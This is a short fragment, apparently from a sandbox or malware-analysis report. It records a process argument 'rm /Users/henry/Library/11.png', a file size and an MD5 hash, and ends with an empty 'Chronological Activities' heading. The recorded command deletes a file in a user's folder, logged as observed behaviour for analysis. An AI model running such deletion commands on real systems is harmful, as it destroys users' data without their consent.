                                Arguments:rm /Users/henry/Library/11.png
                                File size:23952 bytes
                                MD5 hash:11b6a6a1a3102d67ef723cadda365da7

                                Chronological Activities